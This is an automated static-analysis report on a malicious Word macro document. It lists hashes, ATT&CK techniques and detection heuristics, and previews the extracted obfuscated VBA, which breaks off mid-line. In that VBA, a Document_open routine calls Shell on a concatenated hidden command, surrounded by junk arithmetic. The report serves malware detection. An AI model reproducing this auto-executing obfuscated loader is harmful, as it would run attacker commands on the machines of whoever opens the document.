Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 1395118214a02772…

MALICIOUS

Office (OLE)

Size: 263.5 KB
Created: 2018-07-18 07:45:00
Authoring application: Microsoft Office Word
First seen: 2019-11-20
MD5: b1b5fa309a0327bd269dceb2c33da04a
SHA-1: 6eea14357e616454a8c626205d10a7fa5a513e7f
SHA-256: 1395118214a02772cfd4562a0731397c9021fe1ea3e193844d9066fbf549887c
Risk Score: 162

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1203 Exploitation for Client Execution

The sample is a Microsoft Office document containing VBA macros. The critical heuristic firing indicates a Shell() call inside the Document_Open macro, a common technique for executing arbitrary commands as soon as the document is opened. The macro's obfuscated nature and the presence of the Shell() call strongly suggest it is designed to download and execute a secondary payload.

Heuristics (5)

  • VBA macros detected [medium] OLE_VBA_MACROS (3 related findings)
    Document contains VBA macro code.
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    Shell() call in VBA.
  • Document_Open macro [high] OLE_VBA_DOCOPEN
    Document_Open macro.
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 65309 bytes
SHA-256: 3215b001258a1a0fe6c2218233d9983b30fed247a9fab808169b38a3a0f46282

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "oizMYZcvn"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function antSFptqTR()
On Error Resume Next
   zObqmj = 51459 + hawLtW - (EwjdOW + RjVEB)
   uViiYh = 30095 + zqjkz - (ANYwm + SslUOT)
   soEhqi = 99070 + nWrCuc - (tAClAh + nRqCiB)
   PPwzo = 97954 + jtVpJ - (qSrZmv + KNPjvo)
   UErjd = 20653 + CtPKXZ - (GjzqE + TLhpBu)
   REzUJ = 73136 + uwWEPk - (wnkkn + KiLLQc)
End Function
Private Function YJUoLMTalSB()
On Error Resume Next
   vdpIVL = 80807 + uvdPVi - (vUfYs + pBdzzq)
   cMIXV = 39208 + HwhwG - (FLJVwH + ofiYqD)
   isBhW = 84002 + XCmHQp - (XNcAFS + viwbwR)
   HMILjP = 85892 + trZTf - (advRYq + RquZkT)
   khRWzZ = 11511 + QkpUoG - (prEvIU + qwfZnK)
   mwvQP = 95355 + jLKck - (BVubG + XzEEuj)
End Function
Private Function nDzsZCmKOwiHw()
On Error Resume Next
   YjsZk = 40251 + LzsWQ - (kiPAzf + PIkPUH)
   zcFch = 99595 + XOzim - (MTcqF + DGwCbk)
   NQwEjl = 33795 + TSfrG - (fXPPk + KdkqO)
   pJYlK = 12582 + ozsuI - (BijJz + GMMfz)
   JcdYl = 81519 + VwXIZG - (ClMtW + XwMjUF)
End Function
Private Sub Document_open()
On Error Resume Next
   zcEIF = 13634 + AOwoBj + Ufhpzq / zTFlSZ - 21657 + VdJXW - (16835 + FkfWcT + ftwOY * kdADj)
   AjqrU = 57575 + uZqEu + vaQCJ / dKILI - 12132 + KNTSPL - (77400 + KWLaG + vzOYPv * wdonm)
   wHTnl = 65922 + ThBqYp + iTUkQ / CwadwR - 8354 + YILli - (37045 + DCSaK + soPUp * uEFpva)
Shell "" + zXnhQwsT + NppazJbORqo + CVar("c") + EBzRrcGoHKWG + pLVQLOVAjYJjr + ausuu + ablhHbTij + OQYTX + IiIjMRzzpPN + RncdnQsTU + LzUiwLpjEA + jiDrGwZ + bnTHfjG + WvzfOm + WodqNMEtbA + VSNajFFsFuo + fibUiBGk + ODDEJMrZ + bbsizFa + NXkrI + DFjWok + cjHdkcb + iNWCcOGK + qfhiDLv + azHHiOTq + SSvROpzWK + jzIFacD + sLwtpjXNi + mUmdiFCqR + UWjqnNcokk + rViljTAb + tGVlDFbDZiM, 0
   mwJwU = 88872 + zzUSnO + EdbhA / JMuXH - 46694 + hrFNu - (38651 + UIHzG + Ehiwj * YQIJOD)
   sLbLjf = 60656 + rbtSBd + XMuWIw / ooMZj - 21662 + uivwjq - (50295 + HQvaz + ibSCb * fNnpko)
   NaElo = 92306 + QFsHXS + uwWbb / PbivoS - 109 + ZhqJGS - (80239 + DVKKMo + lqLWMV * mnbrl)
End Sub
Private Function nKzLQLwDpVIjw()
On Error Resume Next
   rPfNHf = (FSzsq / zpkfTM + 66598 / 46772) / (97983 / ShpSuM * (KrzRNz + 43782))
   mtCbo = 10787 + radwm + jMtdb / OaDAQS - 5052 + TTzqYV - (90064 + krYolW + YhUYv * dbiIU)
   itmJmY = 95411 + cnXQH + bCEmss / iSvtG - 19848 + sThETP - (7146 + EPCNYv + uwHocB * ZVbJX)
   UbWwYr = (bhUji / VWJTz + 8091 / 47824) / (92499 / Yvuzru * (PnPZS + 44766))
   QnpiK = (lQbjkv / LVCsdN + 61686 / 34641) / (23454 / spmAq * (jpNjC + 91871))
End Function
Private Function zWvErYBz()
On Error Resume Next
   icCciv = 23925 + hawws + hXIXQ / qBNFU - 36770 + misCYX - (43753 + tIifr + tozMql * QrtvB)
   VAsBQ = 32440 + bzwEcw + RNvDiP / DCuXnO - 14737 + EktuVq - (40149 + lWKHJ + uEVaIn * dzPBTS)
   QKQBCi = 56403 + EupRz + GZKCHX / QkNmF - 22461 + rtJjC - (92353 + FNcJr + KERKKo * IqRaI)
   zZDPz = 37111 + UKlFP + bBLit / jsMTC - 53494 + lKAbj - (51897 + XRfKM + Xjpuj * vkwGf)
   dPwIL = 39165 + hoYXZW + oOdrZ / wMNtd - 65330 + VmzGX - (64137 + ddMWU + IMzbo * OQccP)
   rzjnGA = 76479 + hzUiBi + jKVBVh / ACSmzj - 61221 + DVrCjW - (81042 + ZJYfqj + LiZCD * liOAzz)
End Function
Private Function DHBuvwqzvW()
On Error Resume Next
   kiXGiK = 72828 + uwPpdE + EnrPu / bpEAHQ - 15459 + SjikwC - (74516 + qzmcil + JGABAt * HPdwI)
   wrwBCT = 63918 + IXicw + rdCkX / IFGRi - 92387 + XUfdfM - (16247 + mRwwfw + LfcZv * GMzLzi)
   TdWFh = 89137 + zbIcW + XiTXh / StlQf - 49385 + KivSb - (35617 + XDPbib + NDuqz * OqFsNk)
   TiNqf = 29371 + kCJjJm + TSroFj / pqajj - 7287 + ZDFro - (58547 + VClCM + dBlJpG * XmBYiu)
   Gatdu = 53461 + hFiCZ + wtcRLq / vtHPH - 78876 + YSHCtw - (14225 + WtwoJL + AVwbPb * nLkRi)
End Function
Private Function DvjGnMS()
On Error Resume Next
   wGSrlK = (tsWEwC / vBhdCH + 47715 / 47184) / (78363 / sDdiz * (iGPHtc + 
... (truncated)